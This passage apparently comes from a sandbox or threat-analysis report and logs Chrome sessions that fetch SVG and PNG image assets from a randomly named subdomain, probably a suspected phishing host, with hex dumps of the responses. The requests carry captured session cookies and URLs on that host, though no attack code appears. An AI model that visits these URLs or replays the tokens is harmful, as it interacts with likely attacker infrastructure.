                          Data Ascii: 283012 9.91445 27.3488 11.1582 27.8601 13.1562L35.6103 11.1727ZM24.0891 32.889C29.9045 32.889 34.6188 28.1747 34.6188 22.3593H26.6188C26.6188 23.7564 25.4862 24.889 24.0891 24.889V32.889ZM13.5594 22.3593C13.5594 28.1747 18.2737 32.889 24.0891 32.889V24.
                          2024-05-22 15:57:27 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          50192.168.2.449793188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:25 UTC1451OUTGET /wxGHOVhNfB9eJCYocFlGLnZU0vLUJmndqUTPYn2iQJMFdfQ8jFqkPab172 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:27 UTC661INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:27 GMT
                          Content-Type: image/svg+xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Content-Disposition: inline; filename="wxGHOVhNfB9eJCYocFlGLnZU0vLUJmndqUTPYn2iQJMFdfQ8jFqkPab172"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IsFfefGZYUZkFVD2uS6bZY%2FTRRqO2xg1VGO5BCFpzmbDMyx3moxwJRKHVAXlj%2Ba5zPv%2F31ZEynZToYKdQ8NuXBjl7mKYvTLINbgAu2jVVAS5xPYJFByHUvh1mlqKnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e007dfc4542dd-EWR
                          2024-05-22 15:57:27 UTC708INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                          Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                          2024-05-22 15:57:27 UTC1369INData Raw: 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c 31 2e 35 34 32 2c
                          Data Ascii: ,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,
                          2024-05-22 15:57:27 UTC835INData Raw: 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 34 35 41 31 31 2e 32
                          Data Ascii: 9-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279-.645A11.2
                          2024-05-22 15:57:27 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          51192.168.2.449794188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:26 UTC1465OUTGET /rsivy0f9LvMVoGwWXBY36UNQHJ5vLvLswbmHYZghDjaLx4bHrm3aZHETrLuA4WzXtVHef198 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:28 UTC675INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:28 GMT
                          Content-Type: image/svg+xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Content-Disposition: inline; filename="rsivy0f9LvMVoGwWXBY36UNQHJ5vLvLswbmHYZghDjaLx4bHrm3aZHETrLuA4WzXtVHef198"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omj3VTsLSdP5mWdGEJHZ4Kj6hMTybqSSvcN0PbEB9jOPxlS8Ik%2F7Vkx4bMxp2vTNz1%2FWI0zLm9aMMjKC8ly4BMsk22VBDK8mkr5och39n%2F4V2wT9nDjeysewbjlnDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0082fdef42a0-EWR
                          2024-05-22 15:57:28 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                          Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                          2024-05-22 15:57:28 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          52192.168.2.449797188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:27 UTC1454OUTGET /ghhzdSo0pCDRNfU983q6ExVmnoJ4rBpDRip5WrwOkA7XgKsbaoTE86uM12210 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:28 UTC653INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:28 GMT
                          Content-Type: image/png
                          Content-Length: 49602
                          Connection: close
                          Content-Disposition: inline; filename="ghhzdSo0pCDRNfU983q6ExVmnoJ4rBpDRip5WrwOkA7XgKsbaoTE86uM12210"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1ukUKvqTrAyLsZXgdSl6fbt%2Fd1ZZt2LxilhorQsAhpHXx3bgJD1pFR0uApr4BlDghEglVzktVA7ps8hGfGHGqUXncOsiC4%2BT7N5kFzPvDewxYytGJ2vbKTJQv4EjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e00877cbf0f87-EWR
                          2024-05-22 15:57:28 UTC716INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                          Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                          2024-05-22 15:57:28 UTC1369INData Raw: 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3 24 e2 27 53 ad d6 6a
                          Data Ascii: I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$$'Sj
                          2024-05-22 15:57:28 UTC1369INData Raw: 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd 4d 07 fe 45 7a e2 fc
                          Data Ascii: D$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:HMEz
                          2024-05-22 15:57:28 UTC1369INData Raw: 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2 eb bb c0 e0 4c 63 a6
                          Data Ascii: $I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0Lc
                          2024-05-22 15:57:28 UTC1369INData Raw: 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba cd 59 c4 5f 7f ed d6
                          Data Ascii: r>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\Y_
                          2024-05-22 15:57:28 UTC1369INData Raw: 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26 e3 e4 ad 94 c3 5b 89
                          Data Ascii: j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&[
                          2024-05-22 15:57:28 UTC1369INData Raw: 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed 3b 07 f8 4f e0 96 e8 20
                          Data Ascii: OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>;O
                          2024-05-22 15:57:28 UTC1369INData Raw: 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72 21 9d f6 3c 30 31 3a 84
                          Data Ascii: R?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r!<01:
